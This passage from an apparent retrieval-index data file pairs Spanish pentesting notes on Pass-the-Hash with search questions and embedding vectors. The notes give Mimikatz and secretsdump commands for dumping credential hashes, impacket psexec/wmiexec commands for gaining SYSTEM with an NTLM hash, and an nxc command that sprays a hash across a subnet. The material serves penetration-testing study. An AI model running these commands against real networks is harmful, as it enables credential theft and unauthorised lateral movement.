0.0303, -0.03046, 0.03708, 0.02, 0.04447, -0.00233, -0.00965, 0.03919, 0.04181, 0.05921, 0.00817, -0.05433, -0.02916, 0.02362, 0.01484, -0.03212, 0.03797, -0.02289, -0.02467, -0.05613, 0.07296, 0.00358, -0.0438, 0.04087, -0.01164, 0.03425, -0.04787, 0.0188, -0.01983]} -{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Pass-the-Hash\n\n> Te autenticas con el **hash NTLM** sin conocer la contraseΓ±a en claro. La base del Movimiento lateral en AD.", "indexar": "con que programa puedo autenticarme sin conocer la clave de usuario", "v": [-0.07549, 0.00758, -0.1754, -0.12057, 0.13803, -0.08396, -0.06354, 0.01262, -0.17416, -0.1654, -0.00822, -0.03265, -0.02701, -0.08654, 0.04377, 0.06641, 0.12366, -0.03971, 0.09317, 0.07321, 0.12282, -0.13091, -0.06227, -0.03588, -0.1051, -0.08234, 0.04524, 0.00572, 0.09988, -0.05337, 0.04625, 0.04319, 0.06249, -0.05932, 0.07452, 0.00078, 0.04156, -0.02257, 0.00104, 0.0643, 0.10569, -0.05421, -0.04454, 0.13792, 0.10557, 0.0925, 0.02333, -0.02351, 0.05695, -0.0384, -0.12762, -0.04664, -0.15945, -0.13775, -0.06793, -0.06556, 0.11073, -0.00781, -0.01092, 0.00935, -0.02504, 0.02004, 0.05675, -0.00296, 0.03759, 0.02529, 0.12335, 0.04693, 0.01515, 0.0737, 0.01045, 0.04476, -0.01629, -0.04725, 0.00892, 0.02202, -0.00381, -0.01433, 0.0646, 0.00597, -0.00586, -0.00688, 0.08275, 0.04366, -0.06291, -0.04052, 0.12319, -0.06128, 0.04676, -0.04725, 0.04647, 0.07931, 0.09061, 0.08507, 0.07114, -0.02471, 0.09046, -0.09991, -0.00434, 0.02214, 0.00688, -0.03143, -0.07378, 0.1539, 0.04706, 0.04144, 0.02519, -0.12182, -0.02674, 0.0462, -0.04186, -0.01317, -0.11257, -0.07038, -0.08632, 0.10807, -0.06492, -0.12493, -0.00418, -0.10326, -0.07783, -0.02709, 0.02412, -0.03886, 0.09109, 0.03998, -0.0502, 0.12178, -0.02736, 0.01314, -0.02003, 0.06802, -0.01525, 0.03327, 0.02431, -0.05315, -0.0009, -0.07768, -0.01016, 0.01809, -0.01726, 0.09201, 0.02223, 0.03754, 0.03198, -0.08156, -0.05151, -0.09693, -0.09123, 0.01915, -0.0167, -0.00829, 0.02457, 0.09078, -0.06931, -0.0156, -0.0139, -0.04072, -0.03161, 0.05469, -0.04822, -0.01411, -0.07232, -0.01716, 0.04225, -0.05069, 0.00122, -0.01515, 0.07263, 0.09352, 0.00459, 0.08607, 0.04554, -0.05384, 0.0354, 0.02418, -0.03004, -0.10055, -0.01638, -0.08599, -0.10214, 0.00529, 0.02733, -0.01937, -0.05003, -0.01034, -0.07126, 0.04116, -0.01492, 0.03439, 0.02341, 0.0516, -0.03532, 0.02072, 0.01905, -0.00124, 0.01046, 0.03608, 0.05086, -0.04514, -0.08186, -0.00876, 0.02818, -0.00677, 0.0486, 0.05235, -0.06879, 0.00432, 0.02538, 0.04544, 0.06268, -0.07341, 0.0226, -0.02713, -0.00463, -0.06384, 0.01418, 0.06857, 0.04346, 0.07436, 0.00595, 0.07006, 0.02676, 0.10469, 0.02404, -0.07935, 0.07201, -0.00919, 0.04926, 0.01487, -0.05679, -0.02685, -0.02498, -0.01305, 0.07882, 0.01817, 0.0033, -0.03502, -0.03877, -0.0553, -0.02158, 0.05221, -0.02125, -0.05133, 0.0091, 0.02328, -0.07681, 0.02053, -0.01276, -0.02751, -0.03373, 0.01829, 0.06469, -0.06921, 0.0574, 0.01044]} -{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## De dΓ³nde sale el hash\n- Mimikatz `sekurlsa::logonpasswords`\n- secretsdump (SAM/NTDS)\n- `lsadump::sam`", "indexar": "quΓ© herramienta sirve para extraer contraseΓ±as del registro de Windows?", "v": [0.08883, 0.0356, -0.10044, -0.27289, 0.08541, -0.14652, -0.09498, -0.14037, 0.01237, -0.1075, -0.05769, -0.07288, -0.03372, -0.16509, 0.04969, 0.04194, 0.09818, -0.07074, 0.04085, 0.04711, -0.03264, -0.03192, -0.07346, 0.01998, -0.09671, -0.01892, 0.01186, -0.01487, -0.18856, 0.10431, -0.00025, 0.00705, 0.00325, -0.02824, -0.06442, 0.0955, -0.00039, 0.12228, 0.00958, 0.09525, 0.08, 0.11761, -0.09035, 0.12066, -0.01607, -0.03139, 0.06567, 0.02221, 0.10554, 0.05654, -0.05101, -0.15754, -0.07747, -0.06542, 0.00094, -0.11584, 0.17238, -0.0753, 0.01154, -0.04952, -0.1192, 0.09216, -0.0612, 0.03771, -0.11232, -0.10077, 0.08407, -0.03009, -0.04773, 0.11853, -0.04079, 0.01378, 0.09935, -0.03722, 0.00491, 0.00381, 0.03712, -0.03356, 0.03749, 0.04379, -0.01203, -0.00055, 0.00114, -0.08621, -0.07667, -0.0545, 0.02457, -0.04675, 0.06127, -0.13891, 0.10678, 0.00327, -0.043, 0.0382, 0.06953, -0.04985, 0.04481, -0.02776, -0.03137, 0.04107, 0.04962, -0.03866, -0.04797, 0.13545, -0.04666, 0.03808, -0.01462, -0.03774, -0.06377, -0.06401, 0.05436, 0.05732, -0.07045, -0.01664, -0.03427, 0.0436, -0.02122, -0.07123, 0.01938, 0.03028, -0.02566, -0.01939, -0.04706, -0.04237, -0.00541, -0.01722, -0.03658, 0.08969, -0.06331, -0.09151, 0.03318, -0.04072, -0.11153, 0.02952, -0.03262, 0.05109, 0.0268, -0.10016, -0.02319, -0.05864, 0.05443, 0.00964, -0.0163, -0.0573, 0.01899, 0.02925, 0.09178, 0.0458, -0.0551, -0.05717, 0.04722, -0.08488, -0.00655, 0.03476, -0.07365, 0.05034, -0.0563, 0.03957, -0.06998, 0.05151, -0.05489, -0.1022, -0.00467, -0.01816, -0.02375, -0.03792, 0.00804, 0.05075, 0.06755, 0.04306, 0.05046, 0.05464, 0.0613, -0.06648, 0.0031, -0.00516, 0.02123, -0.04202, -0.01357, -0.06399, -0.1003, -0.00616, 0.01691, -0.0328, 0.00554, -0.04309, 0.03873, -0.00319, -0.04526, 0.01173, -0.0264, 0.00285, 0.02011, -0.05176, 0.00306, 0.00365, -0.03158, -0.08093, 0.05864, -0.06117, -0.01858, -0.01532, -0.02681, -0.0631, 0.06565, 0.09669, -0.08465, -0.03506, 0.03398, 0.03333, 0.03266, 0.01865, -0.0091, -0.03334, -0.07193, -0.05312, -0.02079, 0.03032, -0.01452, -0.04822, 0.03847, 0.00636, 0.06051, 0.03399, -0.00757, -0.0023, -0.03674, 0.01418, 0.01751, 0.00566, 0.02045, 0.03344, -0.02864, 0.02277, 0.03878, -0.038, -0.02088, -0.04913, -0.04182, -0.04272, -0.06606, 0.04669, -0.01682, -0.08463, -0.09091, -0.02833, 0.00806, 0.01392, 0.01218, -0.08153, -0.04127, -0.02621, 0.06341, -0.00275, 0.01001, 0.00401]} -{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## De dΓ³nde sale el hash\n- Mimikatz `sekurlsa::logonpasswords`\n- secretsdump (SAM/NTDS)\n- `lsadump::sam`", "indexar": "con quΓ© puedo obtener las contraseΓ±as guardadas en el SAM y NTDS?", "v": [-0.02894, -0.0394, -0.01803, -0.01799, -0.06818, -0.00653, -0.05255, -0.04742, -0.06607, 0.22026, -0.13838, -0.03271, -0.03839, -0.14471, -0.11298, 0.09135, 0.14033, -0.03344, 0.09523, 0.17008, -0.01572, -0.13425, -0.03868, -0.054, 0.0461, -0.04042, 0.03261, -0.00528, -0.12723, 0.0913, 0.02461, -0.00082, -0.01507, 0.03401, -0.03131, 0.04878, -0.01213, 0.14058, 0.05765, 0.03754, 0.10552, 0.15511, -0.0473, 0.08573, 0.10186, -0.10121, -0.01032, -0.02733, 0.1491, -0.14457, -0.18763, 0.05573, -0.12045, -0.16344, -0.0296, -0.11812, 0.1427, 0.05247, -0.01078, 0.0601, -0.11833, 0.01251, 0.10898, 0.05262, -0.06208, -0.21377, 0.13124, 0.01394, -0.00326, 0.09492, -0.00654, -0.04759, -0.03898, -0.04214, -0.02304, 0.01618, -0.04084, -0.0036, 0.06007, 0.06243, -0.06596, -0.07304, 0.02222, -0.02371, -0.06763, -0.01864, -0.01309, -0.0242, -0.03734, -0.10649, 0.10121, -0.02021, 0.0042, 0.01889, -0.00608, -0.06026, -0.0245, 0.0471, -0.06736, -0.05615, -0.01118, -0.0352, -0.01615, 0.10535, -0.10753, 0.01788, 0.0237, 0.0044, 0.01971, -0.02369, 0.10684, 0.03261, -0.06621, 0.02218, -0.00211, -0.02054, -0.01508, -0.02802, 0.00156, 0.03151, 0.03506, -0.01787, 0.04653, 0.01468, 0.07291, 0.07897, 0.01988, 0.03749, -0.12035, -0.03669, 0.02751, -0.04889, -0.05246, -0.03508, 0.03364, -0.00275, -0.07266, -0.08283, -0.05896, -0.02409, 0.0022, -0.02847, 0.06898, 0.01062, 0.03977, 0.0577, 0.00664, -0.00762, 0.00734, -0.00657, 0.02961, -0.02368, 0.02286, 0.04837, -0.02649, 0.08927, 0.00324, -0.04033, -0.09608, 0.13225, 0.00462, 0.02101, -0.04262, 0.0268, -0.04556, -0.04305, -0.00847, 0.01199, 0.00543, -0.02225, -0.02146, 0.02719, -0.04854, -0.03122, 0.00307, -0.05636, 0.01582, -0.04564, 0.00455, -0.11172, -0.00915, -0.00611, -0.02448, 0.01584, 0.02279, -0.10554, 0.06356, 0.00739, -0.04043, -0.02156, 0.04998, 0.04109, -0.01641, 0.01185, -0.02021, -0.03365, -0.02484, -0.04289, -0.01331, -0.00893, -0.02654, -0.03286, -0.01503, -0.03824, 0.0668, 0.01774, -0.12576, 0.04897, -0.0428, 0.04691, 0.04421, -0.00646, 0.01634, -0.08271, -0.11811, -0.0246, -0.04154, 0.06858, -0.03759, 0.02312, 0.01305, 0.03339, 0.05936, 0.03975, 0.02456, -0.04074, -0.00457, 0.0442, 0.0511, 0.05007, 0.01437, 0.02762, -0.02541, 0.0216, 0.09431, 0.0465, -0.07714, -0.01685, -0.01601, 0.01265, 0.01155, 0.05522, 0.02671, -0.06315, 0.00469, -0.02548, -0.03715, 0.00869, 0.0264, -0.01818, 0.00074, -0.02374, 0.02848, 0.00252, -0.00045, -0.02134]} -{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## De dΓ³nde sale el hash\n- Mimikatz `sekurlsa::logonpasswords`\n- secretsdump (SAM/NTDS)\n- `lsadump::sam`", "indexar": "cuΓ‘l es una alternativa libre a mimikatz para recuperar hashes?", "v": [0.15381, -0.02594, -0.08641, 0.08545, -0.07352, -0.01341, -0.24014, 0.01726, -0.10343, -0.05699, 0.04115, 0.00898, 0.03754, 0.18062, 0.18555, -0.00861, 0.0929, 0.06759, 0.02305, 0.0192, 0.03033, -0.04838, -0.08343, -0.06926, 0.0018, -0.09989, -0.0085, 0.113, -0.15868, 0.01287, -0.02001, -0.01511, -0.03374, 0.05112, -0.07335, 0.17125, 0.13943, 0.01194, 0.13902, -0.00964, -0.06652, 0.04942, -0.12694, 0.0703, -0.0215, -0.13598, -0.07479, 0.05139, -0.00184, 0.04759, 0.02686, -0.07617, -0.08906, 0.02419, 0.11374, -0.11723, 0.04794, -0.05579, -0.10252, -0.10363, -0.07258, 0.06151, -0.01762, 0.02533, 0.02604, -0.06876, -0.03432, -0.04656, -0.09513, 0.15742, 0.01605, -0.01014, 0.04146, -0.0597, -0.05854, 0.05221, -0.09991, -0.04717, 0.02803, 0.03513, 0.01899, -0.11542, 0.00753, 0.06344, -0.03154, -0.0539, 0.03729, -0.07585, -0.01223, 0.05497, 0.01037, -0.01611, 0.02646, 0.013, -0.12537, -0.07916, -0.10011, 0.0819, -0.09201, 0.07355, 0.0302, 0.00316, -0.17765, 0.00254, -0.06405, 0.03117, -0.00684, -0.02689, -0.04923, 0.04574, 0.01612, -0.0474, 0.00309, 0.00171, -0.0682, 0.07659, 0.01201, 0.0748, -0.0225, 0.03801, 0.03833, 0.05107, 0.02608, -0.05173, -0.01855, 0.00157, 0.03286, -0.00758, -0.03839, -0.01816, 0.05738, 0.0298, -0.02084, -0.11565, -0.02763, -0.02419, 0.12525, -0.0101, 0.03545, -0.03854, 0.00247, 0.06841, 0.033, -0.02396, 0.09983, -0.02134, 0.07589, -0.06654, -0.00964, -0.05211, 0.01677, 0.06148, 0.07419, 0.02708, 0.01683, 0.01578, -0.04189, -0.04428, -0.10626, 0.06113, 0.00787, -0.07355, 0.00692, 0.03887, 0.06104, 0.00713, -0.07677, -0.03726, 0.00787, -0.00729, 0.01278, -0.02745, 0.07228, -0.05814, 0.05624, 0.03013, -0.02476, -0.00256, 0.02203, -0.10793, 0.04525, -0.01702, -0.0099, -0.02847, 0.01999, -0.11334, 0.01112, 0.09217, -0.00907, 0.00507, -0.02423, -0.07924, -0.07704, -0.05973, -0.02174, -0.03673, 0.05256, -0.02779, 0.01828, 0.01974, -0.02496, -0.03353, 0.03289, -0.00421, 0.06201, 0.00725, -0.07969, -0.00208, 0.0357, -0.0332, 0.04401, 0.0132, 0.10907, 0.0505, -0.00737, 0.07033, -0.07445, -0.0232, -0.01636, -0.03829, 0.01219, 0.04989, 0.02338, 0.06437, -0.0439, 0.0191, 0.02398, 0.10931, -0.01413, 0.01588, 0.00893, 0.01044, 0.01801, 0.03869, 0.01515, -0.03998, 0.03204, -0.01629, 0.03168, -0.02888, 0.04766, 0.06325, -0.07193, -0.00247, -0.03408, -0.00698, -0.07493, 0.06583, -5e-05, 0.00605, 0.00433, 0.02871, 0.04011, 0.00859, -0.04061, -0.05092]} -{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Uso\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20' # β†’ SYSTEM\nimpacket-wmiexec -hashes :NTLMHASH 'admin@10.10.10.20'\nnxc smb 10.10.10.0/24 -u admin -H NTLMHASH # spray del hash por la red\n```", "indexar": "que herramienta puedo usar para ejecutar comandos con un hash de NTLM?", "v": [0.04743, 0.02123, -0.1163, -0.14629, 0.04331, -0.06702, -0.12779, 0.07621, -0.04946, 0.06161, -0.1753, 0.02841, 0.07346, -0.01861, -0.05859, 0.12566, 0.07523, -0.12608, -0.08251, 0.00169, -0.00985, -0.04324, -0.13908, -0.03629, -0.04838, 0.01898, 0.04916, 0.01541, -0.22512, -0.01575, -0.10979, 0.00816, -0.00408, -0.02646, -0.04005, 0.00134, -0.05416, 0.01089, 4e-05, 0.21063, -0.00852, 0.17764, -0.13628, 0.07233, 0.05314, -0.02448, -0.01291, -0.05024, 0.06124, -0.1051, 0.04007, -0.07192, -0.21055, -0.05351, -0.04727, -0.12003, 0.21409, -0.06897, -0.06074, -0.07078, -0.08403, -0.08001, 0.00848, -0.00386, -0.0497, -0.06714, -0.01514, -0.10602, -0.07177, 0.10665, -0.13146, 0.09605, -0.00152, 0.01314, 0.02958, -0.01629, -0.01862, -0.01875, 0.11568, 0.05225, 0.01279, -0.06242, -0.07841, 0.00666, -0.11502, -0.12223, 0.00793, -0.06692, 0.03195, -0.02546, -0.02307, 0.01208, -0.00449, -0.021, 0.09323, 0.00758, 0.03781, -0.04029, 0.04744, -0.01316, 0.1414, -0.08595, -0.04996, 0.14415, -0.01125, -0.016, 0.01856, -0.00782, -0.00242, 0.03378, 0.07728, -0.06697, -0.03251, -0.03668, -0.049, 0.00839, -0.02532, -0.07793, -0.02163, -0.07776, -0.03418, 0.05885, -0.00536, 0.05385, 0.04827, -0.04245, -0.04639, 0.08825, -0.04463, -0.04871, -0.00233, -0.05244, 0.02296, -0.02356, -0.00963, 0.07254, 0.01294, -0.08325, -0.03528, -0.11868, 0.07058, 0.04074, -0.04576, -0.03128, 0.06524, 0.01157, -0.01185, -0.05846, -0.01003, -0.03106, 0.1612, -0.03846, -0.04022, 0.00992, -0.04973, -0.03358, -0.00905, 0.03126, -0.10457, 0.04563, -0.04277, -0.03168, -0.0192, 0.0342, 0.03921, -0.04805, 0.04029, -0.00834, -0.00079, 0.04056, 0.05804, 0.03135, 0.04712, -0.02636, 0.03843, -0.10134, -0.04126, 0.03393, -0.02453, -0.06338, 0.02085, 0.02522, -0.04764, -0.04505, 0.03735, -0.03407, 0.01924, 0.02358, -0.04534, 0.02122, -0.04741, 0.11409, 0.01095, -0.06579, 0.04264, 0.01177, 0.04676, -0.03396, -0.02278, -0.04384, -0.0399, 0.03487, -0.00335, -0.07427, 0.04874, 0.03696, -0.05827, 0.04987, -0.00913, 0.0262, 0.03907, -0.00391, 0.05724, 0.007, -0.04556, -0.02516, -0.00382, 0.0275, -0.00921, -0.02575, 0.00129, 0.03484, 0.05936, -0.01459, 0.02671, -0.02148, -0.02537, -0.01471, 0.00802, -0.00605, 0.01683, -0.00663, -0.01609, -0.01981, 0.00359, -0.04016, -0.00335, 0.01284, -0.03246, -0.02758, -0.0175, 0.05901, 0.00952, -0.03624, -0.01975, -0.04196, -0.06577, -0.01563, -0.052, -0.03136, 0.00475, 0.00346, 0.05005, -0.03767, -0.04736, -0.00892]} -{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Uso\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20' # β†’ SYSTEM\nimpacket-wmiexec -hashes :NTLMHASH 'admin@10.10.10.20'\nnxc smb 10.10.10.0/24 -u admin -H NTLMHASH # spray del hash por la red\n```", "indexar": "con que programa puedo hacer un spray de hashes por una red?", "v": [0.04227, 0.06303, -0.12783, -0.13996, 0.01255, -0.05026, -0.0403, -0.04417, 0.00127, 0.01818, -0.06134, 0.00627, -0.03143, -0.15178, 0.04739, 0.06555, 0.00242, 0.16813, 0.01966, 0.0803, 0.012, -0.0418, -0.2226, 0.01326, 0.02758, 0.08688, 0.02452, 0.07418, -0.21951, -0.0048, -0.04746, -0.00848, -0.02201, 0.008, -0.12596, 0.11065, 0.05548, 0.09172, 0.084, 0.09916, -0.10927, -0.00886, -0.06904, 0.06265, 0.08579, -0.05135, 0.02869, -0.0691, -0.02033, -0.01516, 0.06875, 0.00748, -0.18462, -0.07714, -0.00808, -0.12514, -0.07785, -0.05373, -0.23013, -0.0137, 0.06557, -0.01797, 0.04978, 0.05375, -0.03599, 0.01664, 0.07348, 0.00544, -0.01002, 0.12317, 0.05453, -0.00611, -0.03155, -0.03261, -0.02292, 0.08507, -0.08824, -0.11811, -0.02424, -0.04543, -0.05163, -0.00785, 0.10941, 0.0524, 0.00336, -0.06337, -0.0531, -0.07361, 0.01567, -0.0443, 0.03476, 0.0154, 0.05469, 0.07176, 0.02278, -0.04076, 0.15653, 0.00509, -0.031, 0.04539, -0.01442, -0.11105, -0.10147, 0.0971, 0.00175, 0.01021, 0.10431, 0.04847, 0.06722, 0.06611, 0.01872, -0.05899, -0.0219, -0.07936, 0.03449, -0.03857, -0.02502, 0.06241, 0.01608, -0.03648, -0.13059, -0.01121, -0.06081, 0.07851, 0.16571, -0.05632, -0.09848, -0.02924, -0.15191, 0.07142, 0.05571, 0.07502, -0.04312, -0.07445, 0.03892, 0.01757, 0.04127, -0.01171, 0.02546, -0.03995, 0.05168, 0.07852, 0.00168, -0.01707, 0.00284, -0.01607, -0.02746, -0.11087, -0.01975, -0.01056, 0.04334, -0.00927, 0.01149, 0.04411, -0.02232, -0.00297, 0.08177, 0.00768, -0.05675, 0.03906, -0.09713, 0.00698, -0.00594, 0.01609, 0.03454, 0.00739, 0.01489, -0.02889, 0.03987, 0.09443, -0.02463, 0.00685, 0.04408, -0.02244, -0.02002, -0.01495, 0.03071, -0.1025, 0.03218, -0.08461, 0.01209, -0.01337, 0.02881, -0.01267, 0.04664, -0.044, 0.01159, 0.07084, 0.04242, -0.01503, -0.04488, -0.03795, 0.02029, 0.00737, 0.05584, 0.05527, 0.06448, 0.01553, -0.00939, -0.03646, -0.05308, 0.02329, 0.03494, -0.02791, 0.02603, 0.03758, -0.0149, 0.04492, 0.04471, 0.14729, -0.00229, 0.02971, 0.01498, 0.02329, -0.07559, 0.02867, -0.00276, 0.03325, 0.05617, -0.00575, 0.09519, -0.01367, 0.00564, 0.0686, -0.03355, -0.04203, 0.0224, 0.00844, 0.01612, 0.07219, -0.01349, -0.07565, 0.01348, -0.0081, 0.00417, -0.01175, -0.00642, 0.03386, -0.0595, -0.03412, -0.05285, 0.04423, 0.00708, 0.0005, 0.0086, -0.00613, -0.0696, -0.00101, 0.00102, -0.02076, -0.02333, 0.02805, 0.07191, -0.03816, 0.02328, 0.05354]} -{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Uso\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20' # β†’ SYSTEM\nimpacket-wmiexec -hashes :NTLMHASH 'admin@10.10.10.20'\nnxc smb 10.10.10.0/24 -u admin -H NTLMHASH # spray del hash por la red\n```", "indexar": "cual es una alternativa libre a psexec y wmiexec?", "v": [-0.15635, -0.02341, -0.10469, 0.10059, -0.0417, -0.06343, -0.00602, -0.12994, -0.09417, -0.04727, -0.04816, -0.09744, -0.14196, 0.02213, 0.12653, -0.05611, 0.04946, 0.02849, 0.11064, -0.01669, -0.00232, -0.08908, -0.16897, -0.02826, 0.00888, -0.00173, -0.04218, 0.00273, -0.09667, -0.06026, 0.00485, -0.00582, 0.0191, -0.06573, 0.08523, 0.03318, 0.10847, -0.01494, 0.09194, 0.03049, 0.05833, -0.11713, -0.18461, 0.09132, -0.07335, -0.09586, -0.02527, 0.07053, 0.1823, -0.01726, -0.08252, -0.02635, -0.13161, 0.07105, 0.10711, 0.06688, 0.1041, -0.09326, -0.04741, -0.01949, -0.0333, 0.08675, 0.07193, -0.08325, 0.03439, 0.05601, 0.01909, -0.0624, -0.03973, 0.05766, 0.05481, 0.00798, -0.0371, -0.07462, -0.07758, -0.03877, -0.0826, -0.05499, -0.00577, 0.03257, 0.01571, -0.04094, -0.07793, 0.01616, 0.02035, 0.00683, 0.10658, -0.12865, 0.00025, 0.03976, 0.12357, 0.00344, -0.00264, 0.12255, -0.04787, -0.10321, 0.01234, 0.07247, 0.01658, 0.07241, 0.07424, 0.05968, -0.12923, 0.03191, -0.00493, -0.04368, -0.0582, 0.02348, -0.08632, 0.04049, -0.00989, 0.03963, -0.06192, 0.01741, -0.01243, -0.15542, -0.08245, -0.00949, -0.09477, -0.01603, -0.02727, 0.00237, 0.00247, -0.07838, -0.01128, -0.01812, 0.06303, 0.10416, -0.03243, 0.01967, 0.05221, -0.05305, -0.03257, -0.12874, -0.10993, -0.02266, 0.0952, 0.05579, -0.04206, -0.02584, 0.01966, 0.00616, 0.03261, -0.01767, 0.04229, 0.03044, -0.00745, -0.01026, -0.00182, -0.01125, -0.05704, -0.07207, 0.04189, 0.16646, -0.08838, 0.05151, -0.02903, -0.03689, -0.00155, 0.03255, -0.00115, -0.01499, 0.02453, -0.03118, -0.04071, 0.01891, 0.01881, -0.03528, -0.08558, 0.02607, 0.01016, 0.068, 0.09162, -0.05094, 0.05008, -0.11448, -0.04818, -0.14371, 0.06664, -0.01077, 0.03463, -0.00661, -0.02186, -7e-05, 0.00771, -0.04699, -0.01362, 0.01411, -0.01026, 0.00367, -0.02719, -0.00371, -0.07873, -0.11084, -0.01326, -0.04323, -0.00041, -0.07935, 0.02511, -0.04032, -0.04861, -0.03004, 0.00053, -0.04698, 0.01567, -0.03405, -0.06157, 0.04309, -0.008, 0.06168, 0.05942, 0.02842, 0.0589, -0.01634, -0.06601, 0.0039, 0.06653, -0.01779, -0.04918, 0.01302, 0.02446, 0.02188, 0.03428, -0.02471, 0.0318, 0.04055, 0.03152, 0.02815, 0.01659, 0.01488, -0.03767, 0.00706, -0.01022, 0.00666, 0.04272, 0.04874, 0.01604, -0.01882, -0.02538, -0.06702, 0.08555, 0.10166, -0.05975, -0.06091, -0.02664, -0.01028, -0.10344, 0.01745, -0.02714, -0.03378, -0.02837, 0.04838, 0.02577, -0.01735, 0.0606, 0.05314]} -{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Combos\n- **ReutilizaciΓ³n**: prueba el hash/usuario contra **todos** los hosts (MetodologΓ­a OSCP).\n- Password spraying: la misma pass de un user normal contra `administrator`, `sa`...\n- Hash de krbtgt β†’ ya no es PtH, es Golden Ticket.\n\nRelacionado: Impacket Β· Movimiento lateral Β· OSCP MOC", "indexar": "que herramienta sirve para probar el hash o usuario contra todos los hosts como en la metodologΓ­a OSCP?", "v": [0.08441, -0.07976, -0.1016, -0.20166, -0.01432, -0.17155, -0.05971, -0.00315, 0.02402, -0.08897, -0.06128, 0.00517, 0.07657, -0.00033, -0.00608, 0.00986, 0.1823, -0.06241, -0.04593, 0.0233, -0.05316, -0.00888, -0.14855, 0.02818, 0.02733, -0.00104, 0.0718, -0.03349, -0.19555, -0.05152, -0.04762, -0.05334, -0.04055, -0.00231, -0.12959, 0.01387, -0.10257, -0.07273, 0.00174, 0.17486, 0.00245, 0.01617, -0.05865, 0.10586, 0.04953, 0.00301, -0.05683, 0.03921, -0.06233, 0.06221, -0.01405, -0.20872, -0.23753, 0.00097, -0.04482, -0.13566, 0.04341, -0.10199, -0.02186, -0.11029, -0.07767, 0.02774, -0.00118, -0.05674, 0.05351, -0.09232, -0.06404, -0.03064, -0.14539, 0.0601, -0.04605, 0.093, -0.03762, -0.04205, 0.03848, 0.03704, 0.03929, 0.06909, 0.14779, -0.02824, 0.00797, -0.05536, -0.04737, 0.06565, -0.12995, -0.05446, 0.14022, -0.06878, 0.00595, -0.08455, 0.0252, 0.08493, 0.07263, -0.00965, 0.05233, -0.12554, 0.1552, -0.04097, 0.07458, -0.03523, 0.0847, -0.01827, -0.08143, 0.08469, -0.04966, 0.01485, 0.07425, -0.03112, -0.00212, -0.06607, 0.04278, -0.01238, -0.06592, 0.06066, -0.04313, -0.01826, 0.0152, -0.03443, -0.07458, -0.06628, -0.05932, 0.02969, -0.03519, 0.00926, 0.06505, 0.01269, -0.00782, 0.0641, 0.04661, -0.02391, -0.02867, -0.04336, -0.06076, 0.11673, -0.00414, -0.02882, -0.03428, -0.08787, -0.02322, 0.00025, 0.06632, 0.13104, -0.03555, -0.1134, 0.03149, -0.06998, 0.00348, -0.05043, -0.06796, 0.02314, 0.05096, -0.05455, 0.00309, 0.00167, -0.11904, -0.03769, -0.03287, -0.0421, -0.08724, 0.12972, -0.0392, -0.0658, 0.02204, 0.03145, 0.03572, -0.04832, -0.00014, -0.0166, 0.06111, 0.03905, 0.01887, 0.05697, 0.00616, -0.04463, 0.04117, -0.02787, -0.03203, -0.01373, 0.0108, -0.05031, -0.04138, -0.00883, -0.02651, -0.04616, 0.01367, -0.01356, 0.02366, 0.05035, 0.04151, 0.01649, 0.00073, 0.03958, -0.03752, -0.04257, -0.02601, -0.0169, 0.01214, -0.0347, 0.03468, -0.00247, -0.05581, -0.01028, -0.01175, -0.01365, 0.00907, 0.02715, -0.01846, 0.00625, 0.00805, 0.00596, 0.01849, -0.00756, 0.05742, -0.00364, 0.00233, -0.01104, 0.01272, 0.01964, -0.02994, 0.00267, 0.02903, 0.04042, -0.00532, -0.00467, -0.00981, 0.0521, 0.02847, 0.00565, 0.00814, -0.02689, 0.02249, -0.01151, -0.01276, -0.00867, 0.03364, -0.01651, 0.04399, -0.01323, -0.05608, -0.07968, -0.02004, 0.00884, -0.01618, -0.02813, -0.00723, -0.06823, -0.03205, -0.02571, 0.00938, -0.06371, -0.01946, -0.01006, 0.08919, -0.02456, -0.0049, -0.01351]} -{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Combos\n- **ReutilizaciΓ³n**: prueba el hash/usuario contra **todos** los hosts (MetodologΓ­a OSCP).\n- Password spraying: la misma pass de un user normal contra `administrator`, `sa`...\n- Hash de krbtgt β†’ ya no es PtH, es Golden Ticket.\n\nRelacionado: Impacket Β· Movimiento lateral Β· OSCP MOC", "indexar": "con que puedo hacer un ataque de spray de contraseΓ±as usando credenciales normales?", "v": [0.07899, 0.11561, -0.1825, -0.09601, -0.03756, -0.03058, 0.01901, -0.06931, -0.0379, 0.01056, -0.00477, 0.05963, -0.11045, -0.10918, -0.01788, -0.03375, 0.08259, 0.12476, 0.08245, 0.03227, -0.02986, -0.15551, -0.11879, -0.0209, -0.04376, 0.04278, -0.02114, 0.06401, -0.08489, -0.0859, -0.03237, -0.01551, 0.08437, 0.05918, -0.04235, 0.07701, -0.12877, 0.13098, 0.0826, 0.19271, 0.01536, 